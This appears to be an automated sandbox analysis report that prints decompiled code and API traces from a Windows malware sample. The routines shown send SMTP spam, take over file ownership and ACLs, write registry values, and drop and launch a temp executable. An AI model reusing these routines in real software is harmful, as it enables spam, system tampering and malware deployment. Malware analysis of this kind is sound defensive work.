                                                                                0x0040aa2c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aa2e
                                                                                0x00000000
                                                                                0x0040aa2e
                                                                                0x0040a9db
                                                                                0x0040a8c8
                                                                                0x0040a8d2
                                                                                0x0040a8d4
                                                                                0x0040a8d6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a8e2
                                                                                0x00000000
                                                                                0x0040a8eb
                                                                                0x0040a89c
                                                                                0x0040a8af
                                                                                0x0040a8b8
                                                                                0x00000000
                                                                                0x0040a8b8
                                                                                0x00000000
                                                                                0x0040a89c
                                                                                0x0040a7df
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a7ed
                                                                                0x0040a7f0
                                                                                0x0040a7f3
                                                                                0x0040a803
                                                                                0x0040a7f5
                                                                                0x0040a7f5
                                                                                0x0040a7f5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a845
                                                                                0x0040a848
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a852
                                                                                0x0040a855
                                                                                0x0040a84d
                                                                                0x0040a84d
                                                                                0x0040a7fa
                                                                                0x0040a7fb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a85c
                                                                                0x0040a85e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a86a
                                                                                0x0040a86c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a80a
                                                                                0x0040a80c
                                                                                0x0040a871
                                                                                0x0040a871
                                                                                0x0040a874
                                                                                0x0040a875
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a813
                                                                                0x0040a816
                                                                                0x0040a816
                                                                                0x0040a819
                                                                                0x0040a819
                                                                                0x0040a81b
                                                                                0x0040a81c
                                                                                0x0040a81c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a836
                                                                                0x0040a839
                                                                                0x0040a839
                                                                                0x0040a83c
                                                                                0x0040a83c
                                                                                0x0040a83e
                                                                                0x0040a83f
                                                                                0x0040a83f
                                                                                0x0040a820
                                                                                0x0040a824
                                                                                0x0040a82f
                                                                                0x0040a87a
                                                                                0x0040a87a
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 0040A7FB
                                                                                • lstrlenA.KERNEL32(?,00000000,00000000,00000001), ref: 0040A87E
                                                                                • send.WS2_32(00000000,?,00000000,00000000), ref: 0040A893
                                                                                • wsprintfA.USER32 ref: 0040A8AF
                                                                                • send.WS2_32(00000000,.,00000005,00000000), ref: 0040A8D2
                                                                                • wsprintfA.USER32 ref: 0040A8E2
                                                                                • recv.WS2_32(00000000,?,000003F6,00000000), ref: 0040A97C
                                                                                • wsprintfA.USER32 ref: 0040A9B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$send$lstrlenrecv
                                                                                • String ID: .$AUTH LOGIN$ESMTP$Error sending command (sent = %d/%d)$Incorrect respons$Too big smtp respons (%d bytes)$Too small respons$data$ehlo %s$helo %s$localcfg$mail from:<%s>$quit$rcpt to:<%s>
                                                                                • API String ID: 3650048968-2394369944
                                                                                • Opcode ID: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
                                                                                • Instruction ID: cb8b6fe7cbcb8804cc0a5996a8d7cccc3c4edaa2c523fe44b9a5a0cb3107b5a3
                                                                                • Opcode Fuzzy Hash: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
                                                                                • Instruction Fuzzy Hash: 34A16872A44305AADF209A54DC85FEF3B79AB00304F244437FA05B61D0DA7D9DA98B5F
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E37A70 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 226memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 00E37A96
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00E37ACD
                                                                                • GetLengthSid.ADVAPI32(?), ref: 00E37ADF
                                                                                • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 00E37B01
                                                                                • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 00E37B1F
                                                                                • EqualSid.ADVAPI32(?,?), ref: 00E37B39
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 00E37B4A
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00E37B58
                                                                                • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00E37B68
                                                                                • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00E37B77
                                                                                • LocalFree.KERNEL32(00000000), ref: 00E37B7E
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E37B9A
                                                                                • GetAce.ADVAPI32(?,?,?), ref: 00E37BCA
                                                                                • EqualSid.ADVAPI32(?,?), ref: 00E37BF1
                                                                                • DeleteAce.ADVAPI32(?,?), ref: 00E37C0A
                                                                                • EqualSid.ADVAPI32(?,?), ref: 00E37C2C
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 00E37CB1
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00E37CBF
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00E37CD0
                                                                                • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00E37CE0
                                                                                • LocalFree.KERNEL32(00000000), ref: 00E37CEE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                • String ID: D
                                                                                • API String ID: 3722657555-2746444292
                                                                                • Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                • Instruction ID: 7ce5df27b7ca595d1882632e97153b317d18d35ded3b2252efc18c87b22fe5c8
                                                                                • Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                • Instruction Fuzzy Hash: E9814BB1904219AFDB21CFA4DD88FEEBFB8AF0C344F04906AE545F6150D7759A41CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407809 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 226memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 98%
                                                                                			E00407809(CHAR* _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				void* _v16;
				struct _ACL* _v20;
				signed int _v24;
				int _v28;
				long _v32;
				long _v36;
				long _v40;
				long _v44;
				int _v48;
				int _v52;
				union _SID_NAME_USE _v56;
				int _v60;
				void _v128;
				char _v384;
				char _v512;
				struct _SECURITY_DESCRIPTOR _v1536;
				struct _ACL* _t110;
				int _t120;
				intOrPtr _t121;
				signed int _t123;
				signed int _t141;
				char* _t146;
				signed int _t153;
				void* _t154;
				void* _t155;
				void* _t156;

				_t141 = 0;
				_v28 = 0;
				_v20 = 0;
				_v36 = 0x80;
				if(GetUserNameA( &_v384,  &_v36) == 0) {
					L42:
					return _v28;
				}
				_v32 = 0x44;
				_v40 = 0x80;
				if(LookupAccountNameA(0,  &_v384,  &_v128,  &_v32,  &_v512,  &_v40,  &_v56) == 0) {
					goto L42;
				}
				_v32 = GetLengthSid( &_v128);
				_v44 = 0x400;
				if(GetFileSecurityA(_a4, 5,  &_v1536, 0x400,  &_v44) == 0) {
					goto L42;
				} else {
					if(GetSecurityDescriptorOwner( &_v1536,  &_v16,  &_v48) != 0) {
						_v36 = 0x80;
						_v40 = 0x80;
						if(EqualSid( &_v128, _v16) == 0) {
							_v28 = 1;
							_t155 = LocalAlloc(0x40, 0x14);
							if(_t155 != 0) {
								LocalFree(_t155);
							}
						}
					}
					_v24 = _t141;
					if(GetSecurityDescriptorDacl( &_v1536,  &_v60,  &_v20,  &_v52) == 0) {
						L41:
						goto L42;
					}
					_t110 = _v20;
					if(_t110 == _t141) {
						goto L41;
					}
					_v8 = _v8 & _t141;
					if(0 >= _t110->AceCount) {
						goto L41;
					} else {
						goto L13;
					}
					do {
						L13:
						if(GetAce(_t110, _v8,  &_v12) == 0) {
							L32:
							_v8 = _v8 + 1;
							goto L33;
						}
						_t153 = 0;
						_v16 = _v12 + 8;
						if(_t141 <= 0) {
							L19:
							if(_t141 < 0x20) {
								 *((intOrPtr*)(_t156 + _t141 * 4 - 0xfc)) = _v16;
								_t141 = _t141 + 1;
							}
							_t120 = EqualSid( &_v128, _v16);
							_t146 = _v12;
							if(_t120 == 0) {
								_t121 = 0x1200a8;
							} else {
								asm("sbb eax, eax");
								_t121 = ( ~_a8 & 0x00090046) + 0x1601b9;
							}
							if( *((intOrPtr*)(_t146 + 4)) != _t121) {
								 *((intOrPtr*)(_t146 + 4)) = _t121;
								_t146 = _v12;
								_v24 = 1;
							}
							if( *_t146 != 0 || ( *(_t146 + 1) & 0x00000010) != 0) {
								 *_t146 = 0;
								_t66 = _v16 + 8; // 0xc8685f74
								_t123 =  *_t66;
								if(_t123 != 0) {
									 *((char*)(_v12 + 1)) = (_t123 & 0xffffff00 | _t123 - 0x00000050 > 0x00000000) + 2;
								} else {
									 *((char*)(_v12 + 1)) = 0xb;
								}
								_v24 = 1;
							}
							goto L32;
						}
						while(EqualSid( *(_t156 + _t153 * 4 - 0xfc), _v16) == 0) {
							_t153 = _t153 + 1;
							if(_t153 < _t141) {
								continue;
							}
							break;
						}
						if(_t153 >= _t141) {
							goto L19;
						}
						DeleteAce(_v20, _v8);
						_v24 = 1;
						L33:
						_t110 = _v20;
					} while (_v8 < (_t110->AceCount & 0x0000ffff));
					if(_v24 != 0) {
						_v28 = 1;
						_t154 = LocalAlloc(0x40, 0x14);
						if(_t154 != 0) {
							if(InitializeSecurityDescriptor(_t154, 1) != 0 && SetSecurityDescriptorDacl(_t154, 1, _v20, 0) != 0 && SetFileSecurityA(_a4, 4, _t154) != 0) {
								_v28 = 1;
							}
							LocalFree(_t154);
						}
					}
					goto L41;
				}
			}































                                                                                0x0040781e
                                                                                0x00407826
                                                                                0x00407829
                                                                                0x0040782c
                                                                                0x00407837
                                                                                0x00407a8e
                                                                                0x00407a94
                                                                                0x00407a94
                                                                                0x0040785c
                                                                                0x00407863
                                                                                0x0040786e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040787e
                                                                                0x0040788b
                                                                                0x004078a2
                                                                                0x00000000
                                                                                0x004078a8
                                                                                0x004078c3
                                                                                0x004078cc
                                                                                0x004078cf
                                                                                0x004078da
                                                                                0x004078e0
                                                                                0x004078e9
                                                                                0x004078ed
                                                                                0x00407917
                                                                                0x00407917
                                                                                0x004078ed
                                                                                0x004078da
                                                                                0x00407930
                                                                                0x0040793b
                                                                                0x00407a8d
                                                                                0x00000000
                                                                                0x00407a8d
                                                                                0x00407941
                                                                                0x00407946
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040794c
                                                                                0x00407955
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040795b
                                                                                0x0040795b
                                                                                0x0040796b
                                                                                0x00407a2a
                                                                                0x00407a2a
                                                                                0x00000000
                                                                                0x00407a2a
                                                                                0x00407977
                                                                                0x00407979
                                                                                0x0040797e
                                                                                0x004079ae
                                                                                0x004079b1
                                                                                0x004079b6
                                                                                0x004079bd
                                                                                0x004079bd
                                                                                0x004079c5
                                                                                0x004079cb
                                                                                0x004079d0
                                                                                0x004079e5
                                                                                0x004079d2
                                                                                0x004079d7
                                                                                0x004079de
                                                                                0x004079de
                                                                                0x004079ed
                                                                                0x004079ef
                                                                                0x004079f2
                                                                                0x004079f5
                                                                                0x004079f5
                                                                                0x004079fb
                                                                                0x00407a03
                                                                                0x00407a09
                                                                                0x00407a09
                                                                                0x00407a0e
                                                                                0x00407a24
                                                                                0x00407a10
                                                                                0x00407a13
                                                                                0x00407a13
                                                                                0x00407a27
                                                                                0x00407a27
                                                                                0x00000000
                                                                                0x004079fb
                                                                                0x00407980
                                                                                0x00407994
                                                                                0x00407997
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407997
                                                                                0x0040799b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004079a3
                                                                                0x004079a9
                                                                                0x00407a2d
                                                                                0x00407a2d
                                                                                0x00407a34
                                                                                0x00407a41
                                                                                0x00407a47
                                                                                0x00407a50
                                                                                0x00407a54
                                                                                0x00407a60
                                                                                0x00407a83
                                                                                0x00407a83
                                                                                0x00407a87
                                                                                0x00407a87
                                                                                0x00407a54
                                                                                0x00000000
                                                                                0x00407a41

                                                                                APIs
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 0040782F
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00407866
                                                                                • GetLengthSid.ADVAPI32(?), ref: 00407878
                                                                                • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 0040789A
                                                                                • GetSecurityDescriptorOwner.ADVAPI32(?,00407F63,?), ref: 004078B8
                                                                                • EqualSid.ADVAPI32(?,00407F63), ref: 004078D2
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 004078E3
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 004078F1
                                                                                • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407901
                                                                                • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00407910
                                                                                • LocalFree.KERNEL32(00000000), ref: 00407917
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00407933
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00407963
                                                                                • EqualSid.ADVAPI32(?,00407F63), ref: 0040798A
                                                                                • DeleteAce.ADVAPI32(?,00000000), ref: 004079A3
                                                                                • EqualSid.ADVAPI32(?,00407F63), ref: 004079C5
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 00407A4A
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407A58
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00407A69
                                                                                • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00407A79
                                                                                • LocalFree.KERNEL32(00000000), ref: 00407A87
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                • String ID: D
                                                                                • API String ID: 3722657555-2746444292
                                                                                • Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                • Instruction ID: df0c13f2d89176358eaf39038022480abc221899387876bf5e0f356ce13a0778
                                                                                • Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                • Instruction Fuzzy Hash: 59813C71E04119ABDB11CFA5DD44FEFBBB8AB08340F14817AE505F6290D739AA41CF69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00408328 Relevance: 35.4, APIs: 18, Strings: 2, Instructions: 361registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 97%
                                                                                			E00408328(char* __ecx, char __edx) {
				char _v8;
				void* _v12;
				int _v16;
				char _v20;
				intOrPtr _v24;
				int _v28;
				struct _PROCESS_INFORMATION _v44;
				char _v60;
				struct _STARTUPINFOA _v128;
				char _v388;
				char _v427;
				char _v428;
				char _t88;
				char _t89;
				void* _t91;
				char _t93;
				int _t102;
				char _t107;
				intOrPtr _t113;
				char _t116;
				void* _t117;
				signed int _t122;
				char _t126;
				void* _t128;
				char* _t130;
				char _t131;
				char* _t133;
				char _t134;
				char* _t137;
				int _t139;
				char _t144;
				char _t146;
				char* _t147;
				char _t149;
				char _t153;
				intOrPtr* _t154;
				char* _t156;
				char* _t159;
				char _t160;
				char _t165;
				void* _t174;
				signed int _t177;
				char _t180;
				char* _t188;
				int _t189;
				long _t193;
				void* _t195;
				void* _t196;
				void* _t198;
				void* _t199;

				_t181 = __edx;
				_t173 = __ecx;
				_v16 = 0;
				if(E00407DD6(__edx) != 0) {
					return 1;
				}
				_t88 = E00406EC3();
				__eflags = _t88;
				if(_t88 != 0) {
					_v8 = 0;
					__eflags =  *0x412c3c; // 0x0
					if(__eflags == 0) {
						goto L37;
					}
					__eflags =  *0x412c38; // 0x0
					if(__eflags == 0) {
						goto L37;
					}
					_t130 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
					_t198 = _t196 + 0x14;
					_t131 = RegOpenKeyExA(0x80000001, _t130, 0, 0x101,  &_v12);
					__eflags = _t131;
					if(_t131 != 0) {
						L31:
						_t133 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
						_t198 = _t198 + 0x14;
						_t134 = RegOpenKeyExA(0x80000001, _t133, 0, 0x103,  &_v12);
						__eflags = _t134;
						if(_t134 != 0) {
							L35:
							E0040EE2A(_t173, 0x4122f8, 0, 0x100);
							_t196 = _t198 + 0xc;
							__eflags = _v8;
							if(_v8 != 0) {
								E0040EC2E(_v8);
							}
							goto L37;
						}
						_t188 =  *0x412c3c; // 0x0
						_t137 = _t188;
						_t44 =  &(_t137[1]); // 0x1
						_t173 = _t44;
						do {
							_t181 =  *_t137;
							_t137 =  &(_t137[1]);
							__eflags = _t181;
						} while (_t181 != 0);
						_t139 = _t137 - _t173 + 1;
						__eflags = _t139;
						RegSetValueExA(_v12,  *0x412c38, 0, 1, _t188, _t139);
						RegCloseKey(_v12);
						goto L35;
					}
					_t144 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, 0,  &_v16);
					__eflags = _t144;
					if(_t144 == 0) {
						__eflags = _v28 - 1;
						if(_v28 == 1) {
							__eflags = _v16;
							if(_v16 > 0) {
								_t147 = E0040EBCC(_v16);
								_pop(_t173);
								_v8 = _t147;
								__eflags = _t147;
								if(_t147 != 0) {
									_t173 =  &_v16;
									_t149 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, _t147,  &_v16);
									__eflags = _t149;
									if(_t149 != 0) {
										E0040EC2E(_v8);
										_pop(_t173);
										_v8 = 0;
									}
								}
							}
						}
					}
					RegCloseKey(_v12);
					__eflags = _v8;
					if(_v8 != 0) {
						_t146 = E0040EED1(_v8,  *0x412c3c);
						_pop(_t173);
						__eflags = _t146;
						if(_t146 == 0) {
							goto L35;
						}
					}
					goto L31;
				} else {
					_t153 = E004073FF(_t173, 0x410264, 0, 0,  &_v388,  &_v60);
					_t199 = _t196 + 0x14;
					__eflags = _t153;
					if(_t153 <= 0) {
						L19:
						_t91 = 0;
						L56:
						return _t91;
					}
					__eflags = _v388;
					if(_v388 == 0) {
						goto L19;
					}
					__eflags = _v60;
					if(_v60 == 0) {
						goto L19;
					} else {
						_t154 =  &_v388;
						_t181 = _t154 + 1;
						do {
							_t180 =  *_t154;
							_t154 = _t154 + 1;
							__eflags = _t180;
						} while (_t180 != 0);
						_t156 = _t195 + _t154 - _t181 - 0x181;
						__eflags =  *_t156 - 0x5c;
						if( *_t156 == 0x5c) {
							 *_t156 = 0;
						}
						__eflags =  *0x412159 - 0x60;
						if( *0x412159 < 0x60) {
							L18:
							E0040EE2A(_t180, 0x4122f8, 0, 0x100);
							_t196 = _t199 + 0xc;
							L37:
							_v20 = 0;
							_v8 = 0;
							__eflags = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe"; // 0x43
							if(__eflags == 0) {
								L42:
								__eflags =  *0x412cd8; // 0x0
								if(__eflags != 0) {
									L46:
									_t89 = E00406BA7(0x412cd8);
									_pop(_t174);
									__eflags = _t89;
									if(_t89 == 0) {
										L52:
										 *0x412cd8 = 0;
										L53:
										__eflags = _v8;
										if(_v8 != 0) {
											E0040EC2E(_v8);
										}
										_t91 = 1;
										__eflags = 1;
										goto L56;
									}
									_t93 = E00407E2F(_t181);
									__eflags = _t93;
									if(_t93 != 0) {
										L51:
										DeleteFileA(0x412cd8);
										goto L52;
									}
									_t193 = 0x44;
									E0040EE2A(_t174,  &_v128, 0, _t193);
									_v128.cb = _t193;
									E0040EE2A(_t174,  &_v44, 0, 0x10);
									_v428 = 0x22;
									lstrcpyA( &_v427, 0x412cd8);
									_t102 = lstrlenA( &_v428);
									 *((char*)(_t195 + _t102 - 0x1a8)) = 0x22;
									 *((char*)(_t195 + _t102 - 0x1a7)) = 0;
									E00407FCF(_t174);
									_t107 = CreateProcessA(0,  &_v428, 0, 0, 0, 0x8000000, 0, 0,  &_v128,  &_v44);
									__eflags = _t107;
									if(_t107 == 0) {
										E00407EE6(_t174);
										E00407EAD(_t181, __eflags, 0);
										goto L51;
									}
									CloseHandle(_v44.hThread);
									CloseHandle(_v44);
									goto L53;
								}
								GetTempPathA(0x12c, 0x412cd8);
								_t113 = E00408274(0x412cd8);
								_pop(_t177);
								_v24 = _t113;
								_t116 = (E0040ECA5() & 0x00000003) + 5;
								_v20 = _t116;
								__eflags = _t116;
								if(_t116 <= 0) {
									L45:
									_t117 = E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8);
									_t69 = _v24 + 0x412cd8; // 0x0
									E0040EF00(_t69, _t117);
									E0040EE2A(_t177, 0x4122f8, 0, 0x100);
									_t196 = _t196 + 0x28;
									goto L46;
								} else {
									goto L44;
								}
								do {
									L44:
									_t122 = E0040ECA5();
									_t177 = 0x1a;
									_t181 = _t122 % _t177 + 0x61;
									_v24 = _v24 + 1;
									_v20 = _v20 - 1;
									 *((char*)(_v24 + 0x412cd8)) = _t122 % _t177 + 0x61;
									__eflags = _v20;
								} while (_v20 > 0);
								goto L45;
							}
							_t126 = E0040675C("C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe",  &_v20, 0);
							_t196 = _t196 + 0xc;
							_v8 = _t126;
							__eflags = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe"; // 0x43
							if(__eflags == 0) {
								goto L42;
							}
							__eflags = _t126;
							if(_t126 == 0) {
								goto L42;
							}
							__eflags = _v20 -  *0x4121a4; // 0x0
							if(__eflags != 0) {
								goto L42;
							}
							_t128 = E004024C2(_v8, _t127, 0);
							_t196 = _t196 + 0xc;
							__eflags =  *0x4122d4 - _t128; // 0x0
							if(__eflags == 0) {
								goto L53;
							}
							goto L42;
						}
						_t189 = 4;
						_v8 = 0;
						_v16 = _t189;
						_t159 = E00402544(0x4122f8,  &E00410710, 0x35, 0xe4, 0xc8);
						_t199 = _t199 + 0x14;
						_t160 = RegOpenKeyExA(0x80000002, _t159, 0, 0x103,  &_v12);
						__eflags = _t160;
						if(_t160 != 0) {
							goto L18;
						}
						_t165 = RegQueryValueExA(_v12,  &_v388, 0,  &_v28,  &_v8,  &_v16);
						__eflags = _t165;
						if(_t165 != 0) {
							L16:
							_v8 = 0;
							RegSetValueExA(_v12,  &_v388, 0, _t189,  &_v8, _t189);
							L17:
							RegCloseKey(_v12);
							goto L18;
						}
						__eflags = _v28 - _t189;
						if(_v28 != _t189) {
							goto L16;
						}
						__eflags = _v16 - _t189;
						if(_v16 != _t189) {
							goto L16;
						}
						__eflags = _v8;
						if(_v8 == 0) {
							goto L17;
						}
						goto L16;
					}
				}
			}





















































                                                                                0x00408328
                                                                                0x00408328
                                                                                0x00408334
                                                                                0x0040833e
                                                                                0x00000000
                                                                                0x00408342
                                                                                0x0040834a
                                                                                0x00408354
                                                                                0x00408356
                                                                                0x0040846b
                                                                                0x0040846e
                                                                                0x00408474
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040847a
                                                                                0x00408480
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004084a2
                                                                                0x004084ad
                                                                                0x004084b6
                                                                                0x004084b8
                                                                                0x004084ba
                                                                                0x00408543
                                                                                0x0040855f
                                                                                0x00408564
                                                                                0x0040856d
                                                                                0x0040856f
                                                                                0x00408571
                                                                                0x004085a5
                                                                                0x004085ac
                                                                                0x004085b1
                                                                                0x004085b4
                                                                                0x004085b7
                                                                                0x004085bc
                                                                                0x004085c1
                                                                                0x00000000
                                                                                0x004085b7
                                                                                0x00408573
                                                                                0x00408579
                                                                                0x0040857b
                                                                                0x0040857b
                                                                                0x0040857e
                                                                                0x0040857e
                                                                                0x00408580
                                                                                0x00408581
                                                                                0x00408581
                                                                                0x00408587
                                                                                0x00408587
                                                                                0x00408596
                                                                                0x0040859f
                                                                                0x00000000
                                                                                0x0040859f
                                                                                0x004084d3
                                                                                0x004084d9
                                                                                0x004084db
                                                                                0x004084dd
                                                                                0x004084e1
                                                                                0x004084e3
                                                                                0x004084e6
                                                                                0x004084eb
                                                                                0x004084f0
                                                                                0x004084f1
                                                                                0x004084f4
                                                                                0x004084f6
                                                                                0x004084f8
                                                                                0x0040850b
                                                                                0x00408511
                                                                                0x00408513
                                                                                0x00408518
                                                                                0x0040851d
                                                                                0x0040851e
                                                                                0x0040851e
                                                                                0x00408513
                                                                                0x004084f6
                                                                                0x004084e6
                                                                                0x004084e1
                                                                                0x00408524
                                                                                0x0040852a
                                                                                0x0040852d
                                                                                0x00408538
                                                                                0x0040853e
                                                                                0x0040853f
                                                                                0x00408541
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00408541
                                                                                0x00000000
                                                                                0x0040835c
                                                                                0x0040836e
                                                                                0x00408373
                                                                                0x00408376
                                                                                0x00408378
                                                                                0x00408464
                                                                                0x00408464
                                                                                0x00408779
                                                                                0x00000000
                                                                                0x0040877a
                                                                                0x0040837e
                                                                                0x00408384
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040838a
                                                                                0x0040838d
                                                                                0x00000000
                                                                                0x00408393
                                                                                0x00408393
                                                                                0x00408399
                                                                                0x0040839c
                                                                                0x0040839c
                                                                                0x0040839e
                                                                                0x0040839f
                                                                                0x0040839f
                                                                                0x004083a5
                                                                                0x004083ac
                                                                                0x004083af
                                                                                0x004083b1
                                                                                0x004083b1
                                                                                0x004083b3
                                                                                0x004083ba
                                                                                0x00408450
                                                                                0x00408457
                                                                                0x0040845c
                                                                                0x004085c2
                                                                                0x004085c2
                                                                                0x004085c5
                                                                                0x004085c8
                                                                                0x004085ce
                                                                                0x00408615
                                                                                0x0040861a
                                                                                0x00408620
                                                                                0x004086a7
                                                                                0x004086a8
                                                                                0x004086ad
                                                                                0x004086ae
                                                                                0x004086b0
                                                                                0x00408762
                                                                                0x00408762
                                                                                0x00408768
                                                                                0x00408768
                                                                                0x0040876b
                                                                                0x00408770
                                                                                0x00408775
                                                                                0x00408778
                                                                                0x00408778
                                                                                0x00000000
                                                                                0x00408778
                                                                                0x004086b6
                                                                                0x004086bb
                                                                                0x004086bd
                                                                                0x0040875b
                                                                                0x0040875c
                                                                                0x00000000
                                                                                0x0040875c
                                                                                0x004086c5
                                                                                0x004086cc
                                                                                0x004086d8
                                                                                0x004086db
                                                                                0x004086eb
                                                                                0x004086f2
                                                                                0x004086ff
                                                                                0x00408705
                                                                                0x0040870d
                                                                                0x00408714
                                                                                0x00408733
                                                                                0x00408739
                                                                                0x0040873b
                                                                                0x0040874f
                                                                                0x00408755
                                                                                0x00000000
                                                                                0x0040875a
                                                                                0x00408746
                                                                                0x0040874b
                                                                                0x00000000
                                                                                0x0040874b
                                                                                0x0040862c
                                                                                0x00408633
                                                                                0x00408638
                                                                                0x00408639
                                                                                0x00408644
                                                                                0x00408647
                                                                                0x0040864a
                                                                                0x0040864c
                                                                                0x00408671
                                                                                0x00408683
                                                                                0x0040868c
                                                                                0x00408693
                                                                                0x0040869f
                                                                                0x004086a4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040864e
                                                                                0x0040864e
                                                                                0x0040864e
                                                                                0x00408657
                                                                                0x0040865d
                                                                                0x00408660
                                                                                0x00408663
                                                                                0x00408666
                                                                                0x0040866c
                                                                                0x0040866c
                                                                                0x00000000
                                                                                0x0040864e
                                                                                0x004085da
                                                                                0x004085df
                                                                                0x004085e2
                                                                                0x004085e5
                                                                                0x004085eb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004085ed
                                                                                0x004085ef
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004085f4
                                                                                0x004085fa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00408601
                                                                                0x00408606
                                                                                0x00408609
                                                                                0x0040860f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040860f
                                                                                0x004083c2
                                                                                0x004083df
                                                                                0x004083e2
